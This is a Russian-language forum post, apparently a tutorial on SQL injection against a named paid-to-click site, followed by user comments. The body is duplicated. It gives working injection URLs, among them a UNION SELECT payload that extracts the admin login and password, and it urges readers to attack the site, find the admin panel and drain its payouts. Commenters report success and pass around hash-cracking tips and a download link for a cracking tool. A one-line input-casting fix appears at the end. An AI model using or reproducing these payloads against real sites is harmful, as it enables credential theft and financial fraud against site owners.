У многих в скриптах не фильтруется передаваемый параметр id.
Пример: http://5b-u-x.com/news.php?id=pezdec
Как узнать, есть ли возможность запилить у вас инъекцию?
Идём по адресу новости любой существующей (id - это номер в ссылке на полную новость).
Пример: http://5b-u-x.com/45-new.html -> превращается у нас в http://5b-u-x.com/news.php?id=45
Теперь проверим возможность на проведение инъекции:
http://5b-u-x.com/news.php?id=45\' (в конце просто добавили кавычку, если с одной не канает - тыкаем двойную)
Итак, наш результат: нету сообщения, мол новости не существует и при этом мы видим пустую страницу. В нормальных случаях мы бы увидели ошибку в синтаксисе запроса, в нашем же - вывод ошибок отключён, но тем не менее текстового вердикта, мол id новости неправилен - мы не видим.
Давайте этим воспользуемся. Идём в гугл, набираем запрос вида: \"antichat.ru полный FAQ SQL инъекции\" и читаем. Если хоть немного шарим в SQL запросах, то поехали...
Итак, разберёмся в коде файла, у нас есть запрос, который достаёт инфу о новости:
* - значит берёт всю инфу из всех строк.
Теперь глянем в структуру таблицы tb_news, полей там 4:
- date;
- id;
- newstext;
- tema.
Немного модернизируем нашу ссылку: http://5b-u-x.com/news.php?id=0\' UNION SELECT 1,2,3,4 -- (после -- пробел обязателен, можно также вставить # или /*)
id=0 выбрал id специально несуществующей новости, в противном случае ничего не получится. Цифры 1,2,3,4 специально проставлены для нумерации порядка, чтоб вбить запрос в \"битые поля\". Наш результат - мы видим цифры 2 и 3.
Давайте продолжать модернизировать линк: http://5b-u-x.com/news.php?id=0\' UNION SELECT 1,(SELECT username FROM tb_users WHERE user_status=\'admin\'),(SELECT password FROM tb_users WHERE user_status=\'admin\'),4 -- (опять же пробел)
И что мы видим? Логин и пароль админа, а дальше можно начинать действовать, уж дальше ума много не надо.
1. В статью я не стал расписывать почему и зачем нужны кавычки. Нет смысла - тут многие тугодумы начнут тупо флудить.
2. Букс для примера ещё не был взломан, дерзайте. Там тяжко продумать как его накрутить, ибо админка спрятана.
3. Там автовыплаты, макс.сумма - 15 рублей/раз в сутки. Так что лучше ищите админку.
4. Если на буксе жертве при попытке составить запрос ничего не получается - попробуйте пробелы заменить на + или на /**/
Фикс:
В файле news.php меняем:
На:
Все.
Пример: http://5b-u-x.com/news.php?id=pezdec
Как узнать, есть ли возможность запилить у вас инъекцию?
Идём по адресу новости любой существующей (id - это номер в ссылке на полную новость).
Пример: http://5b-u-x.com/45-new.html -> превращается у нас в http://5b-u-x.com/news.php?id=45
Теперь проверим возможность на проведение инъекции:
http://5b-u-x.com/news.php?id=45\' (в конце просто добавили кавычку, если с одной не канает - тыкаем двойную)
Итак, наш результат: нету сообщения, мол новости не существует и при этом мы видим пустую страницу. В нормальных случаях мы бы увидели ошибку в синтаксисе запроса, в нашем же - вывод ошибок отключён, но тем не менее текстового вердикта, мол id новости неправилен - мы не видим.
Давайте этим воспользуемся. Идём в гугл, набираем запрос вида: \"antichat.ru полный FAQ SQL инъекции\" и читаем. Если хоть немного шарим в SQL запросах, то поехали...
Итак, разберёмся в коде файла, у нас есть запрос, который достаёт инфу о новости:
SELECT * FROM tb_news WHERE id='$newid'
* - значит берёт всю инфу из всех строк.
Теперь глянем в структуру таблицы tb_news, полей там 4:
- date;
- id;
- newstext;
- tema.
Немного модернизируем нашу ссылку: http://5b-u-x.com/news.php?id=0\' UNION SELECT 1,2,3,4 -- (после -- пробел обязателен, можно также вставить # или /*)
id=0 выбрал id специально несуществующей новости, в противном случае ничего не получится. Цифры 1,2,3,4 специально проставлены для нумерации порядка, чтоб вбить запрос в \"битые поля\". Наш результат - мы видим цифры 2 и 3.
Давайте продолжать модернизировать линк: http://5b-u-x.com/news.php?id=0\' UNION SELECT 1,(SELECT username FROM tb_users WHERE user_status=\'admin\'),(SELECT password FROM tb_users WHERE user_status=\'admin\'),4 -- (опять же пробел)
И что мы видим? Логин и пароль админа, а дальше можно начинать действовать, уж дальше ума много не надо.
1. В статью я не стал расписывать почему и зачем нужны кавычки. Нет смысла - тут многие тугодумы начнут тупо флудить.
2. Букс для примера ещё не был взломан, дерзайте. Там тяжко продумать как его накрутить, ибо админка спрятана.
3. Там автовыплаты, макс.сумма - 15 рублей/раз в сутки. Так что лучше ищите админку.
4. Если на буксе жертве при попытке составить запрос ничего не получается - попробуйте пробелы заменить на + или на /**/
Фикс:
В файле news.php меняем:
$newid=$_GET[id];
На:
$newid=intval($_GET[id]);
Все.
6 комментарии
0 загрузки
Детали
- Первый релиз 30 мар 2012
- Последнее обновление 03 авг 2026
- Документация Есть
- Содержимое файлов Исходные файлы
- Всего товаров 203
- Рейтинг (0)
- Регистрация 19 фев 2011
- Уровень 0
- Пользователь подтверждён Да
- Телефон подтверждён Нет
- Email подтверждён Нет

apache88
- 21 июл 2012Мужики помогите дыру в Заданиях закрыть чтоб баланс не накручивали стучите в Асю буду благодарен
[Цитировать] в SeoEdit
Alex
- 09 апр 2012сейчас убраны.а после написания статьи выдавало ошибку про ип адрес.скорее всего вебмани запретили юз х2 после этой статьи ))
а нахер вам админка?? там плагин автовыплат без ограничения раз в сутки) по пять рублей постами крутишь и снимаешь...
оонлайн расшифровка мд5 - это просто подбор из базы слов хешей.никакой сервис не поставит онлайнбрут,т.к. его хост просто нагнётся
Ссылка для скачивания файла MD5CrackFAST2.10.rar
http://file.qip.ru/file/aFfxXaGj/MD5CrackFAST210.html ( 5,87 Мб )
вот софтина - жрёт ресурсы процессора,но всё равно работает.она тупо брутит по всем возможным вариантам)
Green-wm
- 06 апр 2012Через онлайн расшифровку пропусти его... Мб повезет.
half0
- 06 апр 2012кому интересно я нашол админку
http://5b-u-x.com/admin1
и авто выплаты он снял
А если на админку стоит контрольное слово как сожна обойти его ?????
он по-моему зашифрован методом md5
Alex
- 31 мар 2012логично
у меня похожий вопрос - если буксы ломают и начинают жаловаться - почему я?